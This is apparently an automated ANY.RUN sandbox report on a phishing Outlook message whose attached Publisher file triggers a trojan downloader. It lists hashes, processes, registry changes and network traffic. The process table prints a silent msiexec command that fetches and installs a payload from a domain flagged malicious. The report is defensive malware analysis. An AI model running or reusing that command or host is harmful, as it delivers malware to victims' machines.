analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

{Spam } Cheque copy.msg

Full analysis: https://app.any.run/tasks/fff38f0c-0fc4-435b-b3d6-92d3702808f9
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 08, 2018, 11:18:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

0CA09181C5DF741DC5D688EBA8394BCF

SHA1:

BF1534020B0444E1ACC8D13CC079F31AD822F7E7

SHA256:

7021454E432ECB52C3E7C7D849E88CFF4FD404973021EC31737B30619520C18D

SSDEEP:

1536:LRmcA7sv0QE4LMECLOns3D2x8S5GxvSt3y+sMjY:tmcA7st0/Kt35rj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • OUTLOOK.EXE (PID: 920)
    • Loads the Task Scheduler COM API

      • MSPUB.EXE (PID: 3780)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • OUTLOOK.EXE (PID: 920)
    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 920)
      • MSPUB.EXE (PID: 3780)
    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 920)
      • MSPUB.EXE (PID: 3780)
  • INFO

    • Reads Microsoft Office registry keys

      • OUTLOOK.EXE (PID: 920)
      • MSPUB.EXE (PID: 3780)
    • Reads settings of System Certificates

      • MSPUB.EXE (PID: 3780)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.pub | Microsoft Publisher document (38.5)
.msg | Outlook Message (36.2)
.oft | Outlook Form Template (21.1)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start outlook.exe mspub.exe msiexec.exe no specs msiexec.exe

Process information

PID
CMD
Path
Indicators
Parent process
920"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\{Spam } Cheque copy.msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
Modules
Images
c:\progra~1\micros~1\office14\outlook.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\version.dll
c:\windows\system32\msvcrt.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3780"C:\Program Files\Microsoft Office\Office14\MSPUB.EXE" C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\34HWDW0Q\cheque.pubC:\Program Files\Microsoft Office\Office14\MSPUB.EXE
OUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Publisher
Version:
14.0.6026.1000
Modules
Images
c:\program files\microsoft office\office14\mspub.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
3924C:\Windows\System32\msiexec.exe urk=google url=com /q /norestart /i http://myofficeboxsupport.com/shsvcsC:\Windows\System32\msiexec.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1619
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
276C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
2 636
Read events
1 843
Write events
97
Delete events
4

Modification events

(PID) Process:(920) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(920) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(920) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems
Operation:writeName:dri
Value:
6472690098030000010000000000000000000000
(PID) Process:(920) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook
Operation:writeName:MTTT
Value:
980300006A1589C35477D40100000000
(PID) Process:(920) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\SQM
Operation:writeName:SQMSessionNumber
Value:
0
(PID) Process:(920) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\SQM
Operation:writeName:SQMSessionDate
Value:
219768480
(PID) Process:(920) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\0a0d020000000000c000000000000046
Operation:writeName:00030429
Value:
03000000
(PID) Process:(920) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676
Operation:writeName:{ED475418-B0D6-11D2-8C3B-00104B2A6676}
Value:
(PID) Process:(920) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676
Operation:writeName:LastChangeVer
Value:
1200000000000000
(PID) Process:(920) OUTLOOK.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109A10090400000000000F01FEC\Usage
Operation:writeName:OutlookMAPI2Intl_1033
Value:
1298661397
Executable files
0
Suspicious files
2
Text files
27
Unknown types
6

Dropped files

PID
Process
Filename
Type
920OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVR9AE4.tmp.cvr
MD5:
SHA256:
920OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\34HWDW0Q\cheque (2).pub\:Zone.Identifier:$DATA
MD5:
SHA256:
3780MSPUB.EXEC:\Users\admin\AppData\Local\Temp\CVRFF2B.tmp.cvr
MD5:
SHA256:
3780MSPUB.EXEC:\Users\admin\AppData\Local\Temp\~DFD38C3FDDC25E4806.TMP
MD5:
SHA256:
3780MSPUB.EXEC:\Users\admin\AppData\Local\Temp\~DF1A8F24112B4B46A5.TMP
MD5:
SHA256:
3780MSPUB.EXEC:\Users\admin\AppData\Local\Temp\~DF9285ECE76D451C5C.TMP
MD5:
SHA256:
3780MSPUB.EXEC:\Users\admin\AppData\Local\Temp\~DF7EBBDD1DAAE119EB.TMP
MD5:
SHA256:
3780MSPUB.EXEC:\Users\admin\AppData\Local\Temp\~DF72248B7D7727165B.TMP
MD5:
SHA256:
920OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\80EBFC25.datimage
MD5:802C0CADE8CEB699995334FABDF4BB9F
SHA256:DEC72DFFFBBB14A17B2CE3C07CD10956BD9E1379D46AB69EB680EC52ABF3CDDF
920OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\320F8BE2.datimage
MD5:8F6DA6F17D265FA40171F858148ED756
SHA256:CA990C359519F458F7D390526E5080A86840C570B1ED3E5E81293BE78ADDD512
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
4
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
276
msiexec.exe
GET
185.92.74.209:80
http://myofficeboxsupport.com/shsvcs
NL
malicious
920
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
3780
MSPUB.EXE
GET
200
52.109.88.8:80
http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={CD0D7B29-89E7-49C5-8EE1-5D858EFF2593}&build=14.0.6023
NL
xml
1.99 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
920
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
3780
MSPUB.EXE
52.109.88.49:443
office.microsoft.com
Microsoft Corporation
NL
whitelisted
276
msiexec.exe
185.92.74.209:80
myofficeboxsupport.com
Foxcloud Llp
NL
malicious
3780
MSPUB.EXE
52.109.88.8:80
office14client.microsoft.com
Microsoft Corporation
NL
whitelisted

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
office14client.microsoft.com
  • 52.109.88.8
whitelisted
office.microsoft.com
  • 52.109.88.49
whitelisted
myofficeboxsupport.com
  • 185.92.74.209
malicious

Threats

PID
Process
Class
Message
276
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
276
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
No debug info